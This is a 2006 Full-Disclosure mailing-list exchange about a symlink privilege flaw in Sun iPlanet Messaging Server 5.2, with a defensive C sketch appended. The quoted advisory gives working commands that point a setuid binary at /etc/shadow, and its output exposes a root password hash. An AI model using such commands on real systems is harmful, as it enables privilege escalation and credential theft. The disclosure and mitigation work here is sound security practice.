Message-ID: <002d01c6924c$06f5f530$010aa8c0@DORKA>
Date: Sat Jun 17 21:26:13 2006
From: very at unprivate.com (php0t)
Subject: [Fwd: Re: Sun iPlanet Messaging Server 5.2 root password compromise]

Excuse me, but what have I done to you?
And why am I only supposed to disclose bugs when somebody pays me for it?
Can you please explain your rant, so next time I can do -whatever- different?

And by the way, I'm not 'trying to prove I can find holes', I didn't spend any time trying to find a hole in this specific software, I just happened to stumble upon it in the process of trying to gain root - after which I decided to disclose this silly and obvious bug.

So I ask again, is this a problem for you? Am I being ignorant / evil for posting this vuln?
Just tell me what's up - If your problem is that I do not get paid for this - well - I am happy that you are so much after what's best for me but I can do fine on my own - thanks.

php0t / zorro.hu

> You are wasting your time trying to prove you can find holes in software that you AREN'T *PAID FOR* FINDING BUGS.
> Nice advisory, though. You spend time on it.
> Sincerely,
> T.Solo
php0t wrote:
> Summary
> ----------------
> Date: 14 Jun 2006
> Vendor: Sun Microsystems, Inc.
> Name: iPlanet Messaging Server
> Version: 5.2 HotFix 1.16 (built May 14 2003)
> Vuln: msg.conf symlink attack
> Severity: high
>
>
> Software description
> ----------------
> The iPlanet Messaging Server is a software product that provides a
> centralized location for the exchange of information through the
> sending and receiving of messages. The product is designed for
> telecommunications providers, service providers, and enterprises that
> offer messaging capabilities to employees, partners, and customers.
> The iPlanet Messaging Server delivers a Web-based messaging platform
> capable of serving tens of millions of users, and also provides
> value-added differentiated services, including outsourcing, wireless,
> and unified messaging services.
>
>
> Vulnerability description
> ----------------
> Setuid programs part of the iPlanet Messaging Server try to read the
> configuration file msg.conf. If the environment variable CONFIGROOT is
> set, the configuration is read from that directory.
> A symlink attack is possible, and as a result it is possible to read the
> first line of any file with uid=0.
>
>
> Example
> ----------------
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/version
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
> libimta.so 5.2 HotFix 1.16 (built 12:32:17, May 14 2003) SunOS sunbox
> 5.9 Generic_118558-22 sun4u sparc SUNW,Sun-Fire-280R Solaris
> test@...box:/tmp$
> test@...box:/tmp$ ls -la /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> -rws--s--x 1 root mail 446864 Sep 22 2005
> /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> test@...box:/tmp$
> test@...box:/tmp$ ln -s /etc/shadow msg.conf
> test@...box:/tmp$
> test@...box:/tmp$ export CONFIGROOT=.
> test@...box:/tmp$
> test@...box:/tmp$ /iplanet/iMS5/bin/msg/imta/bin/pipe_master
> [14/Jun/2006:11:13:49 +0200] sunbox [119]: General Error:
> func=_configdrv_file_readoption; error=option name should be followed by
> '='; line=root:qW1HFEa1MCD0w:11821::::::
> ERROR: Configuration database initialization failed - see default
> logfile
> test@...box:/tmp$
>
>
> Vulnerable
> ----------------
> iPlanet Messaging Server 5.2 HotFix 1.16 (built May 14 2003)
>
> php0t / zorro.hu
> www.zorro.hu
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
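
Added example, not part of the original message or of the vendor's code: a C sketch of how a setuid program can avoid the class of bug the advisory describes, by ignoring CONFIGROOT when privileged, refusing a symlinked msg.conf, and reporting parse errors without echoing file content. The names DEFAULT_CONFIG_DIR, config_dir, open_config and format_parse_error are hypothetical.

```c
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L   /* O_NOFOLLOW and friends */
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical fixed location, not the product's real path. */
#define DEFAULT_CONFIG_DIR "/etc/exampled"

/* Honour CONFIGROOT only when real and effective ids match, i.e. the
 * process is not running setuid/setgid on behalf of another user. */
const char *config_dir(void)
{
    int privileged = getuid() != geteuid() || getgid() != getegid();
    const char *env = getenv("CONFIGROOT");
    return (!privileged && env && *env) ? env : DEFAULT_CONFIG_DIR;
}

/* Open dir/msg.conf, refusing a symlink as the final path component and
 * anything that is not a regular file owned by trusted_uid and closed to
 * group/other writes. Returns an fd, or -1 with errno set. */
int open_config(const char *dir, uid_t trusted_uid)
{
    char path[4096];
    struct stat st;
    int n = snprintf(path, sizeof path, "%s/msg.conf", dir);
    if (n < 0 || (size_t)n >= sizeof path) { errno = ENAMETOOLONG; return -1; }
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);
    if (fd < 0) return -1;               /* a symlink fails here (ELOOP on Linux) */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != trusted_uid || (st.st_mode & (S_IWGRP | S_IWOTH))) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Report a parse failure by line number only; the offending line is
 * never copied into the message, so file content cannot leak via logs. */
int format_parse_error(char *out, size_t n, int lineno)
{
    return snprintf(out, n, "msg.conf: expected name=value at line %d", lineno);
}
```

O_NOFOLLOW only covers the last path component, so the directory itself has to be trusted; that is why config_dir() drops CONFIGROOT whenever the process is privileged.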